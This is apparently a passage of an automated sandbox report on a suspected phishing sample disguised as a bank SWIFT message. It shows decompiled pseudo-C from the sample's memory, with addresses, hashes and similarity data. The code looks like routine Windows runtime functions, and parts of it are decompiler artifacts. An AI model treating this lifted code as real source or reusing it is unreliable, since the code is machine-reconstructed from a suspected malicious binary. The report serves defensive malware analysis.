                                                                    						 *0x198b1e0(_t61);
                                                                    						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                                                    					}
                                                                    					goto L7;
                                                                    				}
                                                                    				L4:
                                                                    				_t31 = 0x7ffe0386;
                                                                    				goto L5;
                                                                    			}




















                                                                    0x018b0055
                                                                    0x018b005d
                                                                    0x018b0062
                                                                    0x018b006c
                                                                    0x018b006f
                                                                    0x018b0074
                                                                    0x018b007a
                                                                    0x018b007a
                                                                    0x018b0080
                                                                    0x018b0080
                                                                    0x018b0087
                                                                    0x018b008d
                                                                    0x018b008f
                                                                    0x018b0093
                                                                    0x018b0095
                                                                    0x018b009b
                                                                    0x018b00f8
                                                                    0x018b00fb
                                                                    0x018b00fc
                                                                    0x018b00ff
                                                                    0x018b0108
                                                                    0x018b0108
                                                                    0x018b00a2
                                                                    0x018b00a6
                                                                    0x018b00b3
                                                                    0x018b00bc
                                                                    0x018b00c5
                                                                    0x018b00ca
                                                                    0x018fc01e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018fc02d
                                                                    0x018b00d5
                                                                    0x018b00d9
                                                                    0x018fc03d
                                                                    0x018fc046
                                                                    0x018fc046
                                                                    0x018b00df
                                                                    0x018b00e2
                                                                    0x018b00ea
                                                                    0x018b00ef
                                                                    0x018b00f2
                                                                    0x018b00f6
                                                                    0x018b0111
                                                                    0x018b0117
                                                                    0x018b0117
                                                                    0x00000000
                                                                    0x018b00f6
                                                                    0x018b00d0
                                                                    0x018b00d0
                                                                    0x00000000

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: DebugPrintTimes
                                                                    • String ID:
                                                                    • API String ID: 3446177414-0
                                                                    • Opcode ID: 1f08f419afb645c6614713fb31685d98ed29e065b8be2abf98015ec91fea819f
                                                                    • Instruction ID: 138772ae863a055effe8eb337f6610ae7b169a50b027eddc5d354226feacc0f9
                                                                    • Opcode Fuzzy Hash: 1f08f419afb645c6614713fb31685d98ed29e065b8be2abf98015ec91fea819f
                                                                    • Instruction Fuzzy Hash: 01316B31601B088FD726CF28C880B9AB7F5FB89714F14456DE596C7790EB75AA02CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 83%
                                                                    			E018C2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200456, char _a1546912136) {
                                                                    				signed int _v8;
                                                                    				signed int _v16;
                                                                    				unsigned int _v24;
                                                                    				void* _v28;
                                                                    				signed int _v32;
                                                                    				unsigned int _v36;
                                                                    				signed int _v37;
                                                                    				signed int _v40;
                                                                    				signed int _v44;
                                                                    				signed int _v48;
                                                                    				signed int _v52;
                                                                    				signed int _v56;
                                                                    				intOrPtr _v60;
                                                                    				signed int _v64;
                                                                    				signed int _v68;
                                                                    				signed int _v72;
                                                                    				signed int _v76;
                                                                    				signed int _v80;
                                                                    				signed int _t249;
                                                                    				signed int _t253;
                                                                    				signed int _t254;
                                                                    				signed int _t257;
                                                                    				signed int _t259;
                                                                    				intOrPtr _t261;
                                                                    				signed int _t264;
                                                                    				signed int _t271;
                                                                    				signed int _t274;
                                                                    				signed int _t282;
                                                                    				intOrPtr _t288;
                                                                    				signed int _t290;
                                                                    				signed int _t292;
                                                                    				void* _t293;
                                                                    				signed int _t294;
                                                                    				unsigned int _t297;
                                                                    				signed int _t301;
                                                                    				intOrPtr* _t302;
                                                                    				signed int _t303;
                                                                    				signed int _t307;
                                                                    				intOrPtr _t320;
                                                                    				signed int _t329;
                                                                    				signed int _t331;
                                                                    				signed int _t332;
                                                                    				signed int _t336;
                                                                    				signed int _t337;
                                                                    				signed int _t340;
                                                                    				signed int _t342;
                                                                    				signed int _t345;
                                                                    				void* _t346;
                                                                    				void* _t348;
                                                                    
                                                                    				_t342 = _t345;
                                                                    				_t346 = _t345 - 0x4c;
                                                                    				_v8 =  *0x198d360 ^ _t342;
                                                                    				_push(__ebx);
                                                                    				_push(__esi);
                                                                    				_push(__edi);
                                                                    				_t336 = 0x198b2e8;
                                                                    				_v56 = _a4;
                                                                    				_v48 = __edx;
                                                                    				_v60 = __ecx;
                                                                    				_t297 = 0;
                                                                    				_v80 = 0;
                                                                    				asm("movsd");
                                                                    				_v64 = 0;
                                                                    				_v76 = 0;
                                                                    				_v72 = 0;
                                                                    				asm("movsd");
                                                                    				_v44 = 0;
                                                                    				_v52 = 0;
                                                                    				_v68 = 0;
                                                                    				asm("movsd");
                                                                    				_v32 = 0;
                                                                    				_v36 = 0;
                                                                    				asm("movsd");
                                                                    				_v16 = 0;
                                                                    				_t288 = 0x48;
                                                                    				_t317 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                                                    				_t329 = 0;
                                                                    				_v37 = _t317;
                                                                    				if(_v48 <= 0) {
                                                                    					L16:
                                                                    					_t45 = _t288 - 0x48; // 0x0
                                                                    					__eflags = _t45 - 0xfffe;
                                                                    					if(_t45 > 0xfffe) {
                                                                    						_t337 = 0xc0000106;
                                                                    						goto L32;
                                                                    					} else {
                                                                    						_t336 = L018B4620(_t297,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                                                    						_v52 = _t336;
                                                                    						__eflags = _t336;
                                                                    						if(_t336 == 0) {
                                                                    							_t337 = 0xc0000017;
                                                                    							goto L32;
                                                                    						} else {
                                                                    							 *(_t336 + 0x44) =  *(_t336 + 0x44) & 0x00000000;
                                                                    							_t50 = _t336 + 0x48; // 0x48
                                                                    							_t331 = _t50;
                                                                    							_t317 = _v32;
                                                                    							 *((intOrPtr*)(_t336 + 0x3c)) = _t288;
                                                                    							_t290 = 0;
                                                                    							 *((short*)(_t336 + 0x30)) = _v48;
                                                                    							__eflags = _t317;
                                                                    							if(_t317 != 0) {
                                                                    								 *(_t336 + 0x18) = _t331;
                                                                    								__eflags = _t317 - 0x1988478;
                                                                    								 *_t336 = ((0 | _t317 == 0x01988478) - 0x00000001 & 0xfffffffb) + 7;
                                                                    								E018DF3E0(_t331,  *((intOrPtr*)(_t317 + 4)),  *_t317 & 0x0000ffff);
                                                                    								_t317 = _v32;
                                                                    								_t346 = _t346 + 0xc;
                                                                    								_t290 = 1;
                                                                    								__eflags = _a8;
                                                                    								_t331 = _t331 + (( *_t317 & 0x0000ffff) >> 1) * 2;
                                                                    								if(_a8 != 0) {
                                                                    									_t282 = E019239F2(_t331);
                                                                    									_t317 = _v32;
                                                                    									_t331 = _t282;
                                                                    								}
                                                                    							}
                                                                    							_t301 = 0;
                                                                    							_v16 = 0;
                                                                    							__eflags = _v48;
                                                                    							if(_v48 <= 0) {
                                                                    								L31:
                                                                    								_t337 = _v68;
                                                                    								__eflags = 0;
                                                                    								 *((short*)(_t331 - 2)) = 0;
                                                                    								goto L32;
                                                                    							} else {
                                                                    								_t292 = _t336 + _t290 * 4;
                                                                    								_v56 = _t292;
                                                                    								do {
                                                                    									__eflags = _t317;
                                                                    									if(_t317 != 0) {
                                                                    										_t249 =  *(_v60 + _t301 * 4);
                                                                    										__eflags = _t249;
                                                                    										if(_t249 == 0) {
                                                                    											goto L30;
                                                                    										} else {
                                                                    											__eflags = _t249 == 5;
                                                                    											if(_t249 == 5) {
                                                                    												goto L30;
                                                                    											} else {
                                                                    												goto L22;
                                                                    											}
                                                                    										}
                                                                    									} else {
                                                                    										L22:
                                                                    										 *_t292 =  *(_v60 + _t301 * 4);
                                                                    										 *(_t292 + 0x18) = _t331;
                                                                    										_t253 =  *(_v60 + _t301 * 4);
                                                                    										__eflags = _t253 - 8;
                                                                    										if(_t253 > 8) {
                                                                    											goto L56;
                                                                    										} else {
                                                                    											switch( *((intOrPtr*)(_t253 * 4 +  &M018C2959))) {
                                                                    												case 0:
                                                                    													__ax =  *0x1988488;
                                                                    													__eflags = __ax;
                                                                    													if(__ax == 0) {
                                                                    														goto L29;
                                                                    													} else {
                                                                    														__ax & 0x0000ffff = E018DF3E0(__edi,  *0x198848c, __ax & 0x0000ffff);
                                                                    														__eax =  *0x1988488 & 0x0000ffff;
                                                                    														goto L26;
                                                                    													}
                                                                    													goto L108;
                                                                    												case 1:
                                                                    													L45:
                                                                    													E018DF3E0(_t331, _v80, _v64);
                                                                    													_t277 = _v64;
                                                                    													goto L26;
                                                                    												case 2:
                                                                    													 *0x1988480 & 0x0000ffff = E018DF3E0(__edi,  *0x1988484,  *0x1988480 & 0x0000ffff);
                                                                    													__eax =  *0x1988480 & 0x0000ffff;
                                                                    													__eax = ( *0x1988480 & 0x0000ffff) >> 1;
                                                                    													__edi = __edi + __eax * 2;
                                                                    													goto L28;
                                                                    												case 3:
                                                                    													__eax = _v44;
                                                                    													__eflags = __eax;
                                                                    													if(__eax == 0) {
                                                                    														goto L29;
                                                                    													} else {
                                                                    														__esi = __eax + __eax;
                                                                    														__eax = E018DF3E0(__edi, _v72, __esi);
                                                                    														__edi = __edi + __esi;
                                                                    														__esi = _v52;
                                                                    														goto L27;
                                                                    													}
                                                                    													goto L108;
                                                                    												case 4:
                                                                    													_push(0x2e);
                                                                    													_pop(__eax);
                                                                    													 *(__esi + 0x44) = __edi;
                                                                    													 *__edi = __ax;
                                                                    													__edi = __edi + 4;
                                                                    													_push(0x3b);
                                                                    													_pop(__eax);
                                                                    													 *(__edi - 2) = __ax;
                                                                    													goto L29;
                                                                    												case 5:
                                                                    													__eflags = _v36;
                                                                    													if(_v36 == 0) {
                                                                    														goto L45;
                                                                    													} else {
                                                                    														E018DF3E0(_t331, _v76, _v36);
                                                                    														_t277 = _v36;
                                                                    													}
                                                                    													L26:
                                                                    													_t346 = _t346 + 0xc;
                                                                    													_t331 = _t331 + (_t277 >> 1) * 2 + 2;
                                                                    													__eflags = _t331;
                                                                    													L27:
                                                                    													_push(0x3b);
                                                                    													_pop(_t279);
                                                                    													 *((short*)(_t331 - 2)) = _t279;
                                                                    													goto L28;
                                                                    												case 6:
                                                                    													__ebx =  *0x198575c;
                                                                    													__eflags = __ebx - 0x198575c;
                                                                    													if(__ebx != 0x198575c) {
                                                                    														_push(0x3b);
                                                                    														_pop(__esi);
                                                                    														do {
                                                                    															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                    															E018DF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                    															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                    															__edi = __edi + __eax * 2;
                                                                    															__edi = __edi + 2;
                                                                    															 *(__edi - 2) = __si;
                                                                    															__ebx =  *__ebx;
                                                                    															__eflags = __ebx - 0x198575c;
                                                                    														} while (__ebx != 0x198575c);
                                                                    														__esi = _v52;
                                                                    														__ecx = _v16;
                                                                    														__edx = _v32;
                                                                    													}
                                                                    													__ebx = _v56;
                                                                    													goto L29;
                                                                    												case 7:
                                                                    													 *0x1988478 & 0x0000ffff = E018DF3E0(__edi,  *0x198847c,  *0x1988478 & 0x0000ffff);
                                                                    													__eax =  *0x1988478 & 0x0000ffff;
                                                                    													__eax = ( *0x1988478 & 0x0000ffff) >> 1;
                                                                    													__eflags = _a8;
                                                                    													__edi = __edi + __eax * 2;
                                                                    													if(_a8 != 0) {
                                                                    														__ecx = __edi;
                                                                    														__eax = E019239F2(__ecx);
                                                                    														__edi = __eax;
                                                                    													}
                                                                    													goto L28;
                                                                    												case 8:
                                                                    													__eax = 0;
                                                                    													 *(__edi - 2) = __ax;
                                                                    													 *0x1986e58 & 0x0000ffff = E018DF3E0(__edi,  *0x1986e5c,  *0x1986e58 & 0x0000ffff);
                                                                    													 *(__esi + 0x38) = __edi;
                                                                    													__eax =  *0x1986e58 & 0x0000ffff;
                                                                    													__eax = ( *0x1986e58 & 0x0000ffff) >> 1;
                                                                    													__edi = __edi + __eax * 2;
                                                                    													__edi = __edi + 2;
                                                                    													L28:
                                                                    													_t301 = _v16;
                                                                    													_t317 = _v32;
                                                                    													L29:
                                                                    													_t292 = _t292 + 4;
                                                                    													__eflags = _t292;
                                                                    													_v56 = _t292;
                                                                    													goto L30;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    									goto L108;
                                                                    									L30:
                                                                    									_t301 = _t301 + 1;
                                                                    									_v16 = _t301;
                                                                    									__eflags = _t301 - _v48;
                                                                    								} while (_t301 < _v48);
                                                                    								goto L31;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					while(1) {
                                                                    						L1:
                                                                    						_t253 =  *(_v60 + _t329 * 4);
                                                                    						if(_t253 > 8) {
                                                                    							break;
                                                                    						}
                                                                    						switch( *((intOrPtr*)(_t253 * 4 +  &M018C2935))) {
                                                                    							case 0:
                                                                    								__ax =  *0x1988488;
                                                                    								__eflags = __ax;
                                                                    								if(__ax != 0) {
                                                                    									__eax = __ax & 0x0000ffff;
                                                                    									__ebx = __ebx + 2;
                                                                    									__eflags = __ebx;
                                                                    									goto L53;
                                                                    								}
                                                                    								goto L14;
                                                                    							case 1:
                                                                    								L44:
                                                                    								_t317 =  &_v64;
                                                                    								_v80 = E018C2E3E(0,  &_v64);
                                                                    								_t288 = _t288 + _v64 + 2;
                                                                    								goto L13;
                                                                    							case 2:
                                                                    								__eax =  *0x1988480 & 0x0000ffff;
                                                                    								__ebx = __ebx + __eax;
                                                                    								__eflags = __dl;
                                                                    								if(__dl != 0) {
                                                                    									__eax = 0x1988480;
                                                                    									goto L80;
                                                                    								}
                                                                    								goto L14;
                                                                    							case 3:
                                                                    								__eax = E018AEEF0(0x19879a0);
                                                                    								__eax =  &_v44;
                                                                    								_push(__eax);
                                                                    								_push(0);
                                                                    								_push(0);
                                                                    								_push(4);
                                                                    								_push(L"PATH");
                                                                    								_push(0);
                                                                    								L57();
                                                                    								__esi = __eax;
                                                                    								_v68 = __esi;
                                                                    								__eflags = __esi - 0xc0000023;
                                                                    								if(__esi != 0xc0000023) {
                                                                    									L10:
                                                                    									__eax = E018AEB70(__ecx, 0x19879a0);
                                                                    									__eflags = __esi - 0xc0000100;
                                                                    									if(__esi == 0xc0000100) {
                                                                    										_v44 = _v44 & 0x00000000;
                                                                    										__eax = 0;
                                                                    										_v68 = 0;
                                                                    										goto L13;
                                                                    									} else {
                                                                    										__eflags = __esi;
                                                                    										if(__esi < 0) {
                                                                    											L32:
                                                                    											_t227 = _v72;
                                                                    											__eflags = _t227;
                                                                    											if(_t227 != 0) {
                                                                    												L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t227);
                                                                    											}
                                                                    											_t228 = _v52;
                                                                    											__eflags = _t228;
                                                                    											if(_t228 != 0) {
                                                                    												__eflags = _t337;
                                                                    												if(_t337 < 0) {
                                                                    													L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t228);
                                                                    													_t228 = 0;
                                                                    												}
                                                                    											}
                                                                    											goto L36;
                                                                    										} else {
                                                                    											__eax = _v44;
                                                                    											__ebx = __ebx + __eax * 2;
                                                                    											__ebx = __ebx + 2;
                                                                    											__eflags = __ebx;
                                                                    											L13:
                                                                    											_t297 = _v36;
                                                                    											goto L14;
                                                                    										}
                                                                    									}
                                                                    								} else {
                                                                    									__eax = _v44;
                                                                    									__ecx =  *0x1987b9c; // 0x0
                                                                    									_v44 + _v44 =  *[fs:0x30];
                                                                    									__ecx = __ecx + 0x180000;
                                                                    									__eax = L018B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                    									_v72 = __eax;
                                                                    									__eflags = __eax;
                                                                    									if(__eax == 0) {
                                                                    										__eax = E018AEB70(__ecx, 0x19879a0);
                                                                    										__eax = _v52;
                                                                    										L36:
                                                                    										_pop(_t330);
                                                                    										_pop(_t338);
                                                                    										__eflags = _v8 ^ _t342;
                                                                    										_pop(_t289);
                                                                    										return E018DB640(_t228, _t289, _v8 ^ _t342, _t317, _t330, _t338);
                                                                    									} else {
                                                                    										__ecx =  &_v44;
                                                                    										_push(__ecx);
                                                                    										_push(_v44);
                                                                    										_push(__eax);
                                                                    										_push(4);
                                                                    										_push(L"PATH");
                                                                    										_push(0);
                                                                    										L57();
                                                                    										__esi = __eax;
                                                                    										_v68 = __eax;
                                                                    										goto L10;
                                                                    									}
                                                                    								}
                                                                    								goto L108;
                                                                    							case 4:
                                                                    								__ebx = __ebx + 4;
                                                                    								goto L14;
                                                                    							case 5:
                                                                    								_t284 = _v56;
                                                                    								if(_v56 != 0) {
                                                                    									_t317 =  &_v36;
                                                                    									_t286 = E018C2E3E(_t284,  &_v36);
                                                                    									_t297 = _v36;
                                                                    									_v76 = _t286;
                                                                    								}
                                                                    								if(_t297 == 0) {
                                                                    									goto L44;
                                                                    								} else {
                                                                    									_t288 = _t288 + 2 + _t297;
                                                                    								}
                                                                    								goto L14;
                                                                    							case 6:
                                                                    								__eax =  *0x1985764 & 0x0000ffff;
                                                                    								goto L53;
                                                                    							case 7:
                                                                    								__eax =  *0x1988478 & 0x0000ffff;
                                                                    								__ebx = __ebx + __eax;
                                                                    								__eflags = _a8;
                                                                    								if(_a8 != 0) {
                                                                    									__ebx = __ebx + 0x16;
                                                                    									__ebx = __ebx + __eax;
                                                                    								}
                                                                    								__eflags = __dl;
                                                                    								if(__dl != 0) {
                                                                    									__eax = 0x1988478;
                                                                    									L80:
                                                                    									_v32 = __eax;
                                                                    								}
                                                                    								goto L14;
                                                                    							case 8:
                                                                    								__eax =  *0x1986e58 & 0x0000ffff;
                                                                    								__eax = ( *0x1986e58 & 0x0000ffff) + 2;
                                                                    								L53:
                                                                    								__ebx = __ebx + __eax;
                                                                    								L14:
                                                                    								_t329 = _t329 + 1;
                                                                    								if(_t329 >= _v48) {
                                                                    									goto L16;
                                                                    								} else {
                                                                    									_t317 = _v37;
                                                                    									goto L1;
                                                                    								}
                                                                    								goto L108;
                                                                    						}
                                                                    					}
                                                                    					L56:
                                                                    					_t302 = 0x25;
                                                                    					asm("int 0x29");
                                                                    					asm("out 0x28, al");
                                                                    					 *_t302 = es;
                                                                    					asm("o16 sub [ecx+eax+0x18c27e0], cl");
                                                                    					 *[es:ecx] = es;
                                                                    					_t339 = _t336 + 1;
                                                                    					 *((intOrPtr*)(_t302 + _t253 + 0x18c2605)) =  *((intOrPtr*)(_t302 + _t253 + 0x18c2605)) - _t302;
                                                                    					_pop(ds);
                                                                    					_pop(_t293);
                                                                    					 *((intOrPtr*)(_t253 +  &_a1530200456)) =  *((intOrPtr*)(_t253 +  &_a1530200456)) + _t317;
                                                                    					 *_t317 =  *_t317 + _t253;
                                                                    					 *((intOrPtr*)(_t302 + _t253 + 0x18c2880)) =  *((intOrPtr*)(_t302 + _t253 + 0x18c2880)) - _t302;
                                                                    					_t254 = _t253 *  *_t331;
                                                                    					 *_t302 = es;
                                                                    					_push(ds);
                                                                    					 *((intOrPtr*)(_t302 + _t254 + 0x18c284e)) =  *((intOrPtr*)(_t302 + _t254 + 0x18c284e)) - _t302;
                                                                    					asm("daa");
                                                                    					 *_t302 = es;
                                                                    					asm("fcomp dword [ebx-0x70]");
                                                                    					 *((intOrPtr*)(_t254 +  &_a1546912136)) =  *((intOrPtr*)(_t254 +  &_a1546912136)) + _t336 + 1;
                                                                    					_t348 = _t346 + _t302;
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					_push(0x20);
                                                                    					_push(0x196ff00);
                                                                    					E018ED08C(_t293, _t331, _t339);
                                                                    					_v44 =  *[fs:0x18];
                                                                    					_t332 = 0;
                                                                    					 *_a24 = 0;
                                                                    					_t294 = _a12;
                                                                    					__eflags = _t294;
                                                                    					if(_t294 == 0) {
                                                                    						_t257 = 0xc0000100;
                                                                    					} else {
                                                                    						_v8 = 0;
                                                                    						_t340 = 0xc0000100;
                                                                    						_v52 = 0xc0000100;
                                                                    						_t259 = 4;
                                                                    						while(1) {
                                                                    							_v40 = _t259;
                                                                    							__eflags = _t259;
                                                                    							if(_t259 == 0) {
                                                                    								break;
                                                                    							}
                                                                    							_t307 = _t259 * 0xc;
                                                                    							_v48 = _t307;
                                                                    							__eflags = _t294 -  *((intOrPtr*)(_t307 + 0x1871664));
                                                                    							if(__eflags <= 0) {
                                                                    								if(__eflags == 0) {
                                                                    									_t274 = E018DE5C0(_a8,  *((intOrPtr*)(_t307 + 0x1871668)), _t294);
                                                                    									_t348 = _t348 + 0xc;
                                                                    									__eflags = _t274;
                                                                    									if(__eflags == 0) {
                                                                    										_t340 = E019151BE(_t294,  *((intOrPtr*)(_v48 + 0x187166c)), _a16, _t332, _t340, __eflags, _a20, _a24);
                                                                    										_v52 = _t340;
                                                                    										break;
                                                                    									} else {
                                                                    										_t259 = _v40;
                                                                    										goto L62;
                                                                    									}
                                                                    									goto L70;
                                                                    								} else {
                                                                    									L62:
                                                                    									_t259 = _t259 - 1;
                                                                    									continue;
                                                                    								}
                                                                    							}
                                                                    							break;
                                                                    						}
                                                                    						_v32 = _t340;
                                                                    						__eflags = _t340;
                                                                    						if(_t340 < 0) {
                                                                    							__eflags = _t340 - 0xc0000100;
                                                                    							if(_t340 == 0xc0000100) {
                                                                    								_t303 = _a4;
                                                                    								__eflags = _t303;
                                                                    								if(_t303 != 0) {
                                                                    									_v36 = _t303;
                                                                    									__eflags =  *_t303 - _t332;
                                                                    									if( *_t303 == _t332) {
                                                                    										_t340 = 0xc0000100;
                                                                    										goto L76;
                                                                    									} else {
                                                                    										_t320 =  *((intOrPtr*)(_v44 + 0x30));
                                                                    										_t261 =  *((intOrPtr*)(_t320 + 0x10));
                                                                    										__eflags =  *((intOrPtr*)(_t261 + 0x48)) - _t303;
                                                                    										if( *((intOrPtr*)(_t261 + 0x48)) == _t303) {
                                                                    											__eflags =  *(_t320 + 0x1c);
                                                                    											if( *(_t320 + 0x1c) == 0) {
                                                                    												L106:
                                                                    												_t340 = E018C2AE4( &_v36, _a8, _t294, _a16, _a20, _a24);
                                                                    												_v32 = _t340;
                                                                    												__eflags = _t340 - 0xc0000100;
                                                                    												if(_t340 != 0xc0000100) {
                                                                    													goto L69;
                                                                    												} else {
                                                                    													_t332 = 1;
                                                                    													_t303 = _v36;
                                                                    													goto L75;
                                                                    												}
                                                                    											} else {
                                                                    												_t264 = E018A6600( *(_t320 + 0x1c));
                                                                    												__eflags = _t264;
                                                                    												if(_t264 != 0) {
                                                                    													goto L106;
                                                                    												} else {
                                                                    													_t303 = _a4;
                                                                    													goto L75;
                                                                    												}
                                                                    											}
                                                                    										} else {
                                                                    											L75:
                                                                    											_t340 = E018C2C50(_t303, _a8, _t294, _a16, _a20, _a24, _t332);
                                                                    											L76:
                                                                    											_v32 = _t340;
                                                                    											goto L69;
                                                                    										}
                                                                    									}
                                                                    									goto L108;
                                                                    								} else {
                                                                    									E018AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                    									_v8 = 1;
                                                                    									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                    									_t340 = _a24;
                                                                    									_t271 = E018C2AE4( &_v36, _a8, _t294, _a16, _a20, _t340);
                                                                    									_v32 = _t271;
                                                                    									__eflags = _t271 - 0xc0000100;
                                                                    									if(_t271 == 0xc0000100) {
                                                                    										_v32 = E018C2C50(_v36, _a8, _t294, _a16, _a20, _t340, 1);
                                                                    									}
                                                                    									_v8 = _t332;
                                                                    									E018C2ACB();
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						L69:
                                                                    						_v8 = 0xfffffffe;
                                                                    						_t257 = _t340;
                                                                    					}
                                                                    					L70:
                                                                    					return E018ED0D1(_t257);
                                                                    				}
                                                                    				L108:
                                                                    			}




















































                                                                    0x018c2584
                                                                    0x018c2586
                                                                    0x018c2590
                                                                    0x018c2596
                                                                    0x018c2597
                                                                    0x018c2598
                                                                    0x018c2599
                                                                    0x018c259e
                                                                    0x018c25a4
                                                                    0x018c25a9
                                                                    0x018c25ac
                                                                    0x018c25ae
                                                                    0x018c25b1
                                                                    0x018c25b2
                                                                    0x018c25b5
                                                                    0x018c25b8
                                                                    0x018c25bb
                                                                    0x018c25bc
                                                                    0x018c25bf
                                                                    0x018c25c2
                                                                    0x018c25c5
                                                                    0x018c25c6
                                                                    0x018c25cb
                                                                    0x018c25ce
                                                                    0x018c25d8
                                                                    0x018c25dd
                                                                    0x018c25de
                                                                    0x018c25e1
                                                                    0x018c25e3
                                                                    0x018c25e9
                                                                    0x018c26da
                                                                    0x018c26da
                                                                    0x018c26dd
                                                                    0x018c26e2
                                                                    0x01905b56
                                                                    0x00000000
                                                                    0x018c26e8
                                                                    0x018c26f9
                                                                    0x018c26fb
                                                                    0x018c26fe
                                                                    0x018c2700
                                                                    0x01905b60
                                                                    0x00000000
                                                                    0x018c2706
                                                                    0x018c2706
                                                                    0x018c270a
                                                                    0x018c270a
                                                                    0x018c270d
                                                                    0x018c2713
                                                                    0x018c2716
                                                                    0x018c2718
                                                                    0x018c271c
                                                                    0x018c271e
                                                                    0x01905b6c
                                                                    0x01905b6f
                                                                    0x01905b7f
                                                                    0x01905b89
                                                                    0x01905b8e
                                                                    0x01905b93
                                                                    0x01905b96
                                                                    0x01905b9c
                                                                    0x01905ba0
                                                                    0x01905ba3
                                                                    0x01905bab
                                                                    0x01905bb0
                                                                    0x01905bb3
                                                                    0x01905bb3
                                                                    0x01905ba3
                                                                    0x018c2724
                                                                    0x018c2726
                                                                    0x018c2729
                                                                    0x018c272c
                                                                    0x018c279d
                                                                    0x018c279d
                                                                    0x018c27a0
                                                                    0x018c27a2
                                                                    0x00000000
                                                                    0x018c272e
                                                                    0x018c272e
                                                                    0x018c2731
                                                                    0x018c2734
                                                                    0x018c2734
                                                                    0x018c2736
                                                                    0x01905bc1
                                                                    0x01905bc1
                                                                    0x01905bc4
                                                                    0x00000000
                                                                    0x01905bca
                                                                    0x01905bca
                                                                    0x01905bcd
                                                                    0x00000000
                                                                    0x01905bd3
                                                                    0x00000000
                                                                    0x01905bd3
                                                                    0x01905bcd
                                                                    0x018c273c
                                                                    0x018c273c
                                                                    0x018c2742
                                                                    0x018c2747
                                                                    0x018c274a
                                                                    0x018c274d
                                                                    0x018c2750
                                                                    0x00000000
                                                                    0x018c2756
                                                                    0x018c2756
                                                                    0x00000000
                                                                    0x018c2902
                                                                    0x018c2908
                                                                    0x018c290b
                                                                    0x00000000
                                                                    0x018c2911
                                                                    0x018c291c
                                                                    0x018c2921
                                                                    0x00000000
                                                                    0x018c2921
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c2880
                                                                    0x018c2887
                                                                    0x018c288c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c2805
                                                                    0x018c280a
                                                                    0x018c2814
                                                                    0x018c2816
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c281e
                                                                    0x018c2821
                                                                    0x018c2823
                                                                    0x00000000
                                                                    0x018c2829
                                                                    0x018c2829
                                                                    0x018c2831
                                                                    0x018c283c
                                                                    0x018c283e
                                                                    0x00000000
                                                                    0x018c283e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c284e
                                                                    0x018c2850
                                                                    0x018c2851
                                                                    0x018c2854
                                                                    0x018c2857
                                                                    0x018c285a
                                                                    0x018c285c
                                                                    0x018c285d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c275d
                                                                    0x018c2761
                                                                    0x00000000
                                                                    0x018c2767
                                                                    0x018c276e
                                                                    0x018c2773
                                                                    0x018c2773
                                                                    0x018c2776
                                                                    0x018c2778
                                                                    0x018c277e
                                                                    0x018c277e
                                                                    0x018c2781
                                                                    0x018c2781
                                                                    0x018c2783
                                                                    0x018c2784
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01905bd8
                                                                    0x01905bde
                                                                    0x01905be4
                                                                    0x01905be6
                                                                    0x01905be8
                                                                    0x01905be9
                                                                    0x01905bee
                                                                    0x01905bf8
                                                                    0x01905bff
                                                                    0x01905c01
                                                                    0x01905c04
                                                                    0x01905c07
                                                                    0x01905c0b
                                                                    0x01905c0d
                                                                    0x01905c0d
                                                                    0x01905c15
                                                                    0x01905c18
                                                                    0x01905c1b
                                                                    0x01905c1b
                                                                    0x01905c1e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c28c3
                                                                    0x018c28c8
                                                                    0x018c28d2
                                                                    0x018c28d4
                                                                    0x018c28d8
                                                                    0x018c28db
                                                                    0x01905c26
                                                                    0x01905c28
                                                                    0x01905c2d
                                                                    0x01905c2d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01905c34
                                                                    0x01905c36
                                                                    0x01905c49
                                                                    0x01905c4e
                                                                    0x01905c54
                                                                    0x01905c5b
                                                                    0x01905c5d
                                                                    0x01905c60
